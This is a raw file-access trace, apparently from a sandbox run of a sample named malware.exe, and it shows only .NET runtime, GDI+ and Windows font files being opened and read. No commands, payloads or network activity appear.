29/2/2020 - 1:45:59.622Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:59.668Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:59.715Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:59.762Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:59.809Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:59.856Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:59.903Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:59.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:59.997Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.43Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.90Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.137Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.184Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.231Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\uxtheme.dll
29/2/2020 - 1:46:0.231Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
29/2/2020 - 1:46:0.278Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.dllSystem.Windows.Forms.dll
29/2/2020 - 1:46:0.325Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.dllSystem.Windows.Forms.dll
29/2/2020 - 1:46:0.372Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.dllSystem.Windows.Forms.dll
29/2/2020 - 1:46:0.418Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.dllSystem.Windows.Forms.dll
29/2/2020 - 1:46:0.465Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.575Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.575Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.575Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.622Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.668Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.715Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.809Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.903Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.997Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.43Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:1.90Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:46:1.137Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.184Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.231Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.278Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.325Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.372Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.418Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.559Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:1.606Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.653Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:1.700Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.747Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.793Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.840Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.887Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.981Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:2.28Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:2.75Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:2.122Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:2.168Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:2.215Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:2.262Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:46:2.309Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:2.356Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:2.403Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:46:2.450Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:46:2.497Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:2.543Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:2.590Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:2.637Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:2.684Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:2.731Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:2.778Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\Gdiplus.dll
29/2/2020 - 1:46:2.778Open1480C:\malware.exeC:\malware.exe.Local
29/2/2020 - 1:46:2.778Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23407_none_5c02a2f5a011f9be
29/2/2020 - 1:46:2.778Unknown1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23407_none_5c02a2f5a011f9be
29/2/2020 - 1:46:2.778Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23407_none_5c02a2f5a011f9be
29/2/2020 - 1:46:2.778Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23407_none_5c02a2f5a011f9be\GdiPlus.dll
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23407_none_5c02a2f5a011f9be\GdiPlus.dll
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\ShFolder.DLL
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Windows\SysWOW64\shfolder.dll
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Windows\SysWOW64\shfolder.dll
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:46:2.825Unknown1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Users\Behemot\AppData\Local
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Users\Behemot\AppData\Local
29/2/2020 - 1:46:2.825Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\GDIPFONTCACHEV1.DAT
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Windows\SysWOW64\GDIPFONTCACHEV1.DAT
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:46:2.825Unknown1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Users\Behemot\AppData\Local
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Users\Behemot\AppData\Local
29/2/2020 - 1:46:2.825Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\GDIPFONTCACHEV1.DAT
29/2/2020 - 1:46:2.825Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\GDIPFONTCACHEV1.DATGDIPFONTCACHEV1.DAT
29/2/2020 - 1:46:2.825Read1480C:\malware.exeC:\Users\Behemot\AppData\Local\GDIPFONTCACHEV1.DATGDIPFONTCACHEV1.DAT
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Windows\Fonts\marlett.ttf
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Windows\Fonts\marlett.ttf
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Windows\Fonts\marlett.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\marlett.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arial.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arial.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arial.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arial.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\ariali.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\ariali.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\ariali.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\ariali.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arialbd.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arialbd.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arialbd.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arialbd.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arialbi.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arialbi.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arialbi.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arialbi.ttf
29/2/2020 - 1:46:2.856Open1480C:\malware.exeC:\Windows\Fonts\batang.ttc
29/2/2020 - 1:46:2.856Open1480C:\malware.exeC:\Windows\Fonts\batang.ttc
29/2/2020 - 1:46:2.856Open1480C:\malware.exeC:\Windows\Fonts\batang.ttc
29/2/2020 - 1:46:2.856Open1480C:\malware.exeC:\Windows\Fonts\batang.ttc
29/2/2020 - 1:46:2.872Open1480C:\malware.exeC:\Windows\Fonts\batang.ttc
29/2/2020 - 1:46:2.934Open1480C:\malware.exeC:\Windows\Fonts\batang.ttc
29/2/2020 - 1:46:2.981Open1480C:\malware.exeC:\Windows\Fonts\batang.ttc
29/2/2020 - 1:46:2.981Open1480C:\malware.exeC:\Windows\Fonts\cour.ttf
29/2/2020 - 1:46:2.981Open1480C:\malware.exeC:\Windows\Fonts\cour.ttf
29/2/2020 - 1:46:2.981Open1480C:\malware.exeC:\Windows\Fonts\cour.ttf
29/2/2020 - 1:46:3.122Open1480C:\malware.exeC:\Windows\Fonts\cour.ttf
29/2/2020 - 1:46:3.168Open1480C:\malware.exeC:\Windows\Fonts\couri.ttf
29/2/2020 - 1:46:3.168Open1480C:\malware.exeC:\Windows\Fonts\couri.ttf
29/2/2020 - 1:46:3.168Open1480C:\malware.exeC:\Windows\Fonts\couri.ttf
29/2/2020 - 1:46:3.262Open1480C:\malware.exeC:\Windows\Fonts\couri.ttf
29/2/2020 - 1:46:3.309Open1480C:\malware.exeC:\Windows\Fonts\courbd.ttf
29/2/2020 - 1:46:3.309Open1480C:\malware.exeC:\Windows\Fonts\courbd.ttf
29/2/2020 - 1:46:3.309Open1480C:\malware.exeC:\Windows\Fonts\courbd.ttf
29/2/2020 - 1:46:3.450Open1480C:\malware.exeC:\Windows\Fonts\courbd.ttf
29/2/2020 - 1:46:3.497Open1480C:\malware.exeC:\Windows\Fonts\courbi.ttf
29/2/2020 - 1:46:3.497Open1480C:\malware.exeC:\Windows\Fonts\courbi.ttf
29/2/2020 - 1:46:3.497Open1480C:\malware.exeC:\Windows\Fonts\courbi.ttf
29/2/2020 - 1:46:3.637Open1480C:\malware.exeC:\Windows\Fonts\courbi.ttf
29/2/2020 - 1:46:3.684Open1480C:\malware.exeC:\Windows\Fonts\daunpenh.ttf
29/2/2020 - 1:46:3.684Open1480C:\malware.exeC:\Windows\Fonts\daunpenh.ttf
29/2/2020 - 1:46:3.684Open1480C:\malware.exeC:\Windows\Fonts\daunpenh.ttf
29/2/2020 - 1:46:3.778Open1480C:\malware.exeC:\Windows\Fonts\daunpenh.ttf
29/2/2020 - 1:46:3.778Open1480C:\malware.exeC:\Windows\Fonts\dokchamp.ttf
29/2/2020 - 1:46:3.778Open1480C:\malware.exeC:\Windows\Fonts\dokchamp.ttf
29/2/2020 - 1:46:3.778Open1480C:\malware.exeC:\Windows\Fonts\dokchamp.ttf
29/2/2020 - 1:46:3.872Open1480C:\malware.exeC:\Windows\Fonts\dokchamp.ttf
29/2/2020 - 1:46:3.872Open1480C:\malware.exeC:\Windows\Fonts\estre.ttf
29/2/2020 - 1:46:3.872Open1480C:\malware.exeC:\Windows\Fonts\estre.ttf
